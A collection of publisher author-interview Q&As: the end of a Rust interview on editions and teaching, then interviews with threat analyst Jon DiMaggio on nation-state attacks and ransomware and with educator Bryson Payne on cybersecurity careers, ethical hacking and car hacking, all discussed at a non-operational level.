The end result could be an objectively better replacement for some hallmark crate in the ecosystem, an easing of restrictions in the type system, or a change to the recommended way to write code – all of which move the needle along towards a better Rust. That sentiment's best summarized by David Tolnay’s self-quote from 2016: “This language seems neat but it's too bad all the worthwhile libraries are already being built by somebody else.”

NSP: Alumni of the Rust Core team have said that it’s a systems language designed for the next 40 years – quite an appealing hook for businesses and organizations that want their fundamental code base to be usable well into the future. What are some of the key design decisions that have made Rust, in effect, built to last?

JG: Rust takes backwards compatibility across versions of the compiler very seriously, and the intent is that (correct) code that compiled with an older version of the compiler should continue to compile indefinitely. To ensure this, larger changes to the language are tested by re-building all versions of all crates published to to check that there are no regressions. Of course, the flip side of backwards compatibility is that it can be difficult to make improvements to the language, especially around default behavior.

The Rust project’s idea to bridge this divide is the “edition” system. At its core, the idea is to periodically cut new Rust editions that crates can opt into to take advantage of the latest non-backwards-compatible improvements, but with the promise that crates using different editions can co-exist and interoperate, and that old editions will continue to be supported indefinitely. This necessarily limits what changes can be made through editions, but so far it has proven to be a good balance between “don’t break old stuff” and “enable development of new stuff” that is so vital to a language’s long-term health.

The Rust community’s commitment to semantic versioning also underpins some of Rust’s long-term stability promises – that is, by allowing crates to declare through their version number when they make breaking changes, Rust can ensure that even as dependencies change, their dependents will continue to build long into the future (though potentially losing out on improvements and bug fixes as old versions stop being maintained).

NSP: One of the goals listed on the Rust 2018 roadmap was to develop teaching resources for intermediate Rustaceans, which I believe is what spurred you to start streaming your live-coding sessions on YouTube. Developers have really embraced them as a way of learning how to use Rust “for real.” Why is it useful, in your view, for newcomers to see an experienced Rust programmer go through the whole development process and see real systems implemented in real time?

JG: Learning a language on your own is a daunting task that requires self-motivation and perseverance. You need to find a problem you’re interested in solving; you need to find the will to get through the initial learning curve where you’ll get stuck more often than you’ll make meaningful progress; and you have to accept the inevitable rabbit holes that you’ll go down when it turns out things don’t work the way you thought they did. That’s not an insurmountable challenge, and some people really enjoy the journey, but it is also time-consuming, humbling and, at times, quite frustrating. Especially because it can feel like you’re infinitely far from what you really wanted to build.

Watching experienced developers build something, especially if you’re watching live and can ask questions, provides a shortcut of sorts. You get to be directly exposed to good development and debugging processes; you get exposure to language mechanisms and tools that you may otherwise not have found for a while on your own; and you spend less time stuck searching for answers, since the experienced developer can probably explain why something doesn’t work shortly after discovering the problem. Of course, it’s not a complete replacement. You don’t get as much of a say in what problem is being worked on, which means you may not be as invested in it, and you won’t get the same exposure to teaching resources that you may later need as you’re trying to work things out on your own. Ultimately, I think of it as a worthwhile “experience booster” to supplement a healthy and steady diet of writing code yourself.

NSP: The popularity of your videos notwithstanding, you’ve said that part of what inspired you to write the book is that “they’re not for everyone,” and that some people – yourself included – have a different learning style. Given both mediums cover advanced topics (pinning, async, variance, and so on), would you say the book is an alternative to the live coding sessions, or is it designed to complement them? In other words, would a developer who’s watched your videos still benefit from the book (and vice versa)?

JG: It’s a bit of a mix. The "Crust of Rust" videos cover topics that are covered in the book, and the book covers topics in my videos, but often in fairly different ways. I think it’s likely that consuming both still leads to a deeper understanding than consuming either in isolation. But I also think that consuming either of them should be enough to at least give you the working knowledge you need to start playing with a given Rust feature yourself.

For readers of the book, I would actually recommend watching one of the longer live-coding streams on my channel (over the Crust videos), because they cover a lot of ground that’s hard to capture in a book. Topics like how to think about an error message, or how to navigate Rust documentation work best when demonstrated in practice. And who knows – you may even find the problem area interesting enough that you watch the whole thing to the end!

And with that… std::process::exit

Cracking Cybercrimes with Threat Analyst Jon DiMaggio

Our illuminating Author Spotlight series continues this month with Jon DiMaggio – author of The Art of Cyberwarfare: An Investigator's Guide to Espionage, Ransomware, and Organized Cybercrime (March 2022). In the following Q&A, we talk with him about the difference between traditional threats and nation-state attacks, the reasons that critical infrastructure is an easy target for threat actors, the emerging "magic formula" for defeating ransomware, and the fact that just because you're paranoid doesn't mean they aren't targeting you on social media.

Art of Cyberwarfare cover Jon DiMaggio headshot

DiMaggio is a recognized industry veteran in the business of “chasing bad guys,” with over 15 years of experience as a threat analyst. Currently he serves as chief security strategist at Analyst1, and his research on Advanced Persistent Threats (APTs) has identified enough new tactics, techniques, and procedures (TTPs) to garner him near-celebrity status in the cyber world. A fixture on the speaker circuit and at conferences, including RSA (and this month’s CYBERWARCON), DiMaggio has also been featured on Fox, CNN, Bloomberg, Reuters TV, and in publications such as WIRED, Vice, and Dark Reading. He continues to write professional blog posts, intel reports, and white papers on his research into cyber espionage and targeted attacks – insights that have been cited by law enforcement and used in nation-state indictments.

No Starch Press: You’re known as one of the first intelligence analysts to focus on attacks executed by nation-state hacking groups – referred to as Advanced Persistent Threats. What’s the difference between traditional cyberattacks and APTs?

Jon DiMaggio: Traditional cybercriminals conduct attacks relying on a user to click a link in an email or visit a specific website. If the attack fails or security mechanisms defeat the threat before it can successfully infect a victim, the attack is over. That's why, with some exceptions, traditional attacks are geared at targets of opportunity, and not tailored to a specific victim.

Nation-state attacks, however, are the exact opposite. Nation-state attackers target specific victims, and are not only motivated but well-resourced. These advanced attackers have the backing of a government, and often develop their own malware and infrastructure to use in their attacks. Also, unlike traditional threats, nation-state attackers are rarely motivated by financial gain. Instead, they seek to steal intellectual property, sensitive communications, and other data types to advance or provide an advantage to their sponsoring nation.

NSP: Governments and militaries are no longer the only targets of nation-state hackers – private-sector companies are now under attack as well. Most of them already have automated security mechanisms, but are those an adequate defense against APTs?

JD: No. Due to the human element behind nation-state attacks, automated security defenses are not enough. Human-driven attacks simply return to the system through another door. And unlike other threats, nation-state attackers are in it for the long game, which is why the attacks continue even if initially defeated by automated defenses. For these reasons, you must handle nation-state attacks differently than any other threat your organization will face – ideally, by deploying human threat hunters.

NSP: Another disturbing trend is the growing list of advanced cyber threats targeting the industrial control systems (ICS) of critical infrastructure, like the U.S. power grid. In terms of cyberwarfare, are we getting closer to seeing intrusion campaigns against our electrical, water, and transportation systems escalate from espionage or reconnaissance missions to highly disruptive attacks that could paralyze entire cities?

JD: Not only are we getting closer to attackers getting closer to our critical infrastructure, but it has already happened in other countries. In 2015, the Russian government conducted cyber attacks that resulted in shutting down power across critical areas of Ukraine.

In 2017, when I worked at Symantec, our team discovered a Russian-based nation-state attacker we dubbed "Dragon Fly," who infiltrated the U.S. power grid. The group was very close to gaining access to critical systems responsible for powering cities across the United States. In this case, security companies and the federal government worked together to mitigate the threat. This was a close call, but it just shows that nation-states are targeting our power grid – and likely will continue the effort moving forward.

NSP: In early October, the FBI and Cybersecurity Infrastructure and Security Agency (CISA) issued a warning that ransomware attackers, in particular, have been targeting water treatment and wastewater facilities. Do you have any insight into why ransomware attackers have recently moved from banks, local governments and healthcare systems to utility companies? Moreover, why are these critical facilities still so vulnerable to compromise given what we know about the threat and what’s at stake?

JD: Critical infrastructure appeals to ransomware attackers because they likely feel there is a greater chance the victim will pay. Additionally, the breach will be very apparent to the public, like in the Colonial Pipeline attack, when fuel stopped flowing and it resulted in a gas shortage across the East Coast. The effect of this type of attack is meant to be dramatic, and attackers know there will be high pressure from the general public to recover quickly. Usually, the fastest way to recover is to pay the ransomware and obtain the decryption key.

Also, critical infrastructure often provides an easy target to savvy attackers. For example, when a cybercriminal attacked the water system in Florida last year, he did so by taking advantage of technology and infrastructure that allowed workers to remotely access the critical controls used to regulate the system. In short, the ease of access for city workers was more important than the system's security. This, unfortunately, is a common problem. To address many of these existing vulnerabilities will require building systems based on security – and not ease of use. While this may be less important to a retail provider, it should not be an option for industries involved with our infrastructure.

NSP: Over the past year you’ve focused your expertise on nation-state ransomware. One thing I’ve learned from your work is just how long sophisticated intruders spend in a victim’s network before kidnapping their data and sending a ransom notice, often lurking for weeks if not months. Why is attacker “dwell” time an important security metric?

JD: Yes, that's a point many security analysts are unaware of. Enterprise ransomware gangs spend between 3 to 21 days on a victim network, with the average time being around 10 days. During this time, the attacker enumerates the network, obtains and escalates their privileges, disables security services, delete backups, and steals the victim's sensitive data. Finally, once the staging and data theft phase is complete, they execute the ransomware payload throughout the victim's network.

The reason this timeframe is so important is that the human attacker is active on your network. The takeaway is that the longer the attacker engages within your network, the better chance a good threat-hunting team will have to find them. This is why I keep emphasizing that you really need a human team to hunt for advanced threats, not simply rely on automated defenses.

NSP: As ransomware has evolved and diversified, AI has found its way into the mix, turbo-charging attacks that can automatically scan networks for weaknesses, exploit firewall rules, find open ports that have been overlooked, and so on. But machine learning works both ways. What role could AI tools play in threat hunting?

JD: The combination of both artificial intelligence along with human threat hunters creates the magic formula necessary to defeat ransomware attacks. AI is one of the fastest and most accurate ways to identify suspicious or malicious activity, and make quick mitigation decisions.

Based on the level of success ransomware gangs have had in recent years, current identification and mitigation capabilities are not working. At least, not consistently. In fact, several security vendors already base their technologies on artificial intelligence to mitigate threats. For example, the cybersecurity company DarkTrace recently used their tech – which relies on AI – to defeat a LockBit ransomware attack. (LockBit is a particularly pernicious ransomware-as-a-service gang that specializes in fast encryption speeds.) Using AI, DarkTrace identified and mitigated the attack in mere hours of its presence within the environment.

NSP: Sounds like the AI future is nigh! Shifting tracks, let's wrap this Q&A up in the present. You chase bad guys for a living. And not just any bad guys – the kind who could bring an entire nation to its knees. But you’re also a dad. Do you talk to your kids about what you do? If so, how do you explain things like nation-state attacks, ransomware gangs, or cyberwarfare on their level (or at least in a way that sounds less scary) when they ask about your day?

JD: I do talk to my kids about what I do. I actually try to get them involved, and spend time teaching them and explaining some of the work I do at a high level. My youngest son Damian and I even did a podcast together on ransomware. My oldest son Anthony is a freshman in high school and just started taking cyber security classes this year.

They think what I do is more like what they see in the movies, so they will be in for a disappointment when they figure out its more research, analysis and writing than hacking bad guys. However, it’s very rewarding that they have an interest in what I do, and often brag to their friends about it. At the same time, they've seen me working with encoded text and malware, and make comments that I stare at “gibberish” all day and pretend to be working! But overall they are really proud of me and think what I do is “cool."

NSP: Part of your objectively "cool" job entails thinking like the adversary. While it seems unlikely a nation-state actor would hijack a home webcam or set up a fake WAP attack at the local cafe, are there any lessons you've learned from a career spent analyzing cyber criminals that inform your personal online security habits outside of work, or that you try to instill in your children?

JD: Yes, due to my work I have a very different, limited online life. For example, outside of work-related social media, I have no personal accounts. And even with my limited social-media presence, I do not ever connect with family members – only work colleagues. I've used social media to map out relationships with adversary accounts, and know that someone could do the same to me. For that reason, I don’t use social media and, unfortunately for them, at least for now, my kids don't either. It’s not that I'm over-protective, but I don’t want them targeted by an attacker in an effort to get to me. And, to be honest, I think it's healthier at this point in life to let them just be kids. They will have an entire lifetime to be engulfed in social media, but for now I want them to just be kids.

As for my personal habits online, I use three different identity monitor and protection companies to keep an eye on my accounts. I never use the same password twice, nor do I use real “dictionary words” – and I always use two-factor authentication in addition to a hard-key (Yubi-key). I am religious about updating my passwords frequently, and you will never find a device in my home with a camera that is not covered. I also do not use traditional cloud-based services from vendors like Apple and Google.

To be honest, I live a pretty paranoid life because of the work I do and the fact that I put my name out there. At the same time, I think I need to be a bit paranoid, because if there is anything my job has taught me it is that anyone and anything can be hacked and compromised.

Cyber Defender Bryson Payne Takes Us to School

We continue the Cybersecurity Awareness Month edition of our ongoing Author Spotlight series with Bryson Payne, PhD – author of Go H*ck Yourself: An Ethical Approach to Cyber Attacks and Defense (January 2022). In the following Q&A, we talk with him about training the next generation of cyber defenders, why there's never been a better time to get a job in infosec, the security benefits of thinking like an adversary, and whether ransomware could soon be coming for your car. (Spoiler alert: it's already here!)

Go Hck Yourself Cover bryson Payne

Dr. Payne (@brysonpayne) holds the elite CISSP, GREM, GPEN, and CEH certifications, and is an award-winning cyber coach, author, TEDx speaker, and founding director of the Center for Cyber Operations Education at the University of North Georgia (an NSA-DHS Center for Academic Excellence in Cyber Defense). He's also a tenured professor of computer science at UNG, teaching aspiring coders and cyber professionals since 1998 – including coaching UNG’s champion NSA Codebreaker Challenge cyber ops team. His previous No Starch Press titles include the bestsellers Learn Java the Easy Way (2017) and Teach Your Kids to Code (2015).

No Starch Press: Cybersecurity Awareness Month is a great time to talk with you, because your career's been dedicated to making people aware of common and emerging security vulnerabilities. Recently though, high-profile hacks have hit the headlines like never before, with attacks on public utilities, government agencies, and customer databases causing real alarm among the general public. Are we starting to see a shift in the way mainstream society thinks about cybersecurity? If so, how can this be harnessed to make infosec stronger across the board?

Bryson Payne: All of us are seeing cyberattacks and breaches in the news, in the companies we do business with, and even in our own families. It’s a scary time to be so dependent upon technology, but there’s a bright side, yes –regular people are becoming smarter about how they use their devices, how they secure their information, and what information they share.

By understanding the threats that are out there, and how cybercriminals and cyberterrorists perform simple to complex attacks, you and I can protect ourselves and our families from cybercrime (or worse). And by training a new generation of cyber defenders, we can better protect our nation and our economy from future cyber threats.

NSP: You’re the founding director of the Center for Cyber Operations Education at UNG, where you’re also a tenured professor of computer science. So perhaps it’s no surprise that in 2018 UNG began offering a bachelor’s degree in cybersecurity – one of the nation’s first. Considering there are already a number of academic pathways that can lead to successful careers in the infosec world, what’s the benefit of pursuing such a specific major?

BP: The hands-on experience our students gain from real-world ethical hacking, forensics, network security, and reverse engineering in the classroom, in competitions, or in industry certifications, is more like what they’ll see in industry, government, and military cyber roles than traditional computer science or IT programs. In fact, the NSA and Department of Homeland Security are certifying more National Centers of Academic Excellence in Cyber Defense, like UNG, each year in order to give students the real-world skills needed to fight cybercrime, cyber terrorism, and even cyberwarfare for the next generation.

NSP: Does the addition of this degree program reflect a growing demand for cybersecurity pros in the workforce? And, for anyone reading this who’s considering going into the field (or going back to school to get credentialed), what are some of the career options you encourage students to explore?

BP: According to, there are over 400,000 positions in cybersecurity open right now in the U.S. alone, with tens of thousands of new postings appearing every month. If you’re considering going into cyber, there’s never been a better time to get a certification, take a course, or study on your own.

If you like police dramas or mysteries, forensics could be a good fit. If you like taking things apart and (sometimes) putting them back together, reverse engineering or ethical hacking might be fun for you. If you like making sure everything works like it’s supposed to, you might make a great network operations or security operations center analyst. There’s a job for everyone, from trainers to managers to technicians – and the pay is growing faster than for many positions in non-security fields.

NSP: Studies have shown that at least half of college-age adults don’t pursue tech-related careers because they believe the subjects are too difficult to learn. What do you say to people who are interested in cybersecurity but don’t think they have what it takes?

BP: There are so many paths into cyber, whether you start out in psychology, journalism, international affairs, criminal justice, business, math, science, engineering, even health sciences. Cyber is a team sport, and we need people who understand not just the technology, but the people, processes, and even the cultures and languages involved in cybercrime, cyberattacks, and cyberwarfare. Every organization, from Fortune 500 companies to city governments, schools, and healthcare institutions, needs people like you and me thinking about cybersecurity and how to protect employees or customers.

But, while it's important to know that not every cyber job is a technical role, the more comfortable you are with the technology, the farther you can go.

NSP: Your upcoming book, Go H*ck Yourself, teaches readers how to perform just about every major type of attack, from stealing and cracking passwords, to launch phishing attacks, using social engineering tactics, and infecting devices with malware. Some critics might find it ironic that a champion of cyber defense would write a book that literally teaches people how to execute malicious hacks. Explain yourself!

BP: Just like in a martial arts class, you have to learn to kick and punch while you’re learning to block kicks and punches – you have to understand the offense to be able to defend yourself. By thinking like an adversary, you’ll see new ways to protect yourself, your company, your family, and the devices and systems you rely on in your daily life.

For too long we’ve been told what to do, but not why we need to do it. A great example is the password cracking you mentioned. When a reader sees how quickly and easily they can crack a one- or two-word password, even with numbers and symbols added to it, they finally have the mental tools to understand why we’re advocating for passphrases of four or five words. It’s the same with all the other attacks – once you see what a hacker can do, you understand how important good cyber hygiene is, and how small steps to secure your devices can really pay off.

NSP: One type of attack that's really skyrocketed lately is ransomware. Your home state of Georgia is just one example – city and county governments, state agencies, hospital systems, even local election systems have fallen victim to ransom demands. With hackers hammering away at our institutional weak spots, something as simple as not installing a security patch right away, or clicking on a link in a socially engineered email can usher in a potentially devastating attack. What do you think can be done to prevent the human errors arguably fueling the current ransomware rage?

BP: Ransomware is definitely one of the most serious threats to your business, your family, and your own financial security. But the good news is that you can keep yourself from being an easy target. While the news often refers to humans as the weakest link, I actually see us as the best first line of defense. Employees and leaders who can spot phishing emails, who install updates and patches regularly, and who use good cyber hygiene can block more than 99% of known attacks before they get into your organization! And smart security-minded computer users can also apply these practices at home to protect themselves and their loved ones from online adversaries on the prowl for easy vulnerabilities.

NSP: Along those same lines, a lot of organizations have started backing up their files as a failsafe. But hackers being hackers, they’ve already adapted: double-extortion ransomware is now the norm, where the data’s exfiltrated before it’s encrypted so it can be released online if the ransom is not paid. How bad is the problem, and what's the solution?

BP: Double-extortion malware can have the most devastating financial impact short of cyber-physical attacks (and by that I mean when malware takes over a manufacturing facility, critical infrastructure, or medical facility and causes real-world, physical damage to real equipment or even endangers human life). It's true that backups used to be enough to recover from ransomware without paying the ransom, but these double-extortion attacks can steal data for months before locking down systems and demanding payment.

The best defense, in addition to those backups, is having well-trained cyber professionals doing what we call "active threat hunting" – looking for suspicious activity, like small file transfers overnight or to unknown networks, and tracking down systems that show indicators of attack or compromise. That’s why it’s important that we train more cyber defenders. Every organization needs cyber heroes now, so it's the perfect time to develop these skills.

NSP: Dr. Payne, you have arrived at your final destination. (Well, my last question anyway.) Over the past decade you’ve done some very cool conference presentations on car hacking, and have since turned them into a tutorial on your blog. The cool factor aside, this is an increasingly relevant skill set for aspiring white hats – since 2016 there’s been a 94% year-over-year increase in automotive cybersecurity incidents, including remote attacks that can control your steering, pump your brakes, shut down the engine, unlock your doors, open the trunk, etc.

1) Is it only a matter of time before ransomware infects this realm of life, with people, say, unable to start their car until they pay a hacker? 2) In the future, should automakers be pentesting cars at the level they perform crash tests? 3) Does this keep you up at night, or are you optimistic that your UNG graduates will have a solution?

BP: It is only a matter of time before we see ransomware and similar attacks regularly affecting smart cars. Today’s automobiles can have more than 40 computer chips, dozens of systems, and networks and connections from USB to 5G, Wi-Fi, Bluetooth, GPS, satellite radio, and more. We call that the “attack surface” of a system, and with so many ways for hackers to try to get into your vehicle, we’ve actually already seen successful remote attacks in the wild – and we’ll continue to see new ones. The good news is that every make and model is slightly different, so a hack that works on a Honda might not work on a Ford, and vice versa.

That being said, auto manufacturers have a responsibility to secure the networks and computer systems inside your vehicle and mine from malicious hackers, which is why I happen to believe that teaching young people how to test and secure these systems – starting within a virtual environment like we do in the book – is one of the best ways to protect our vehicles and our personal safety from ransomware on the roadway.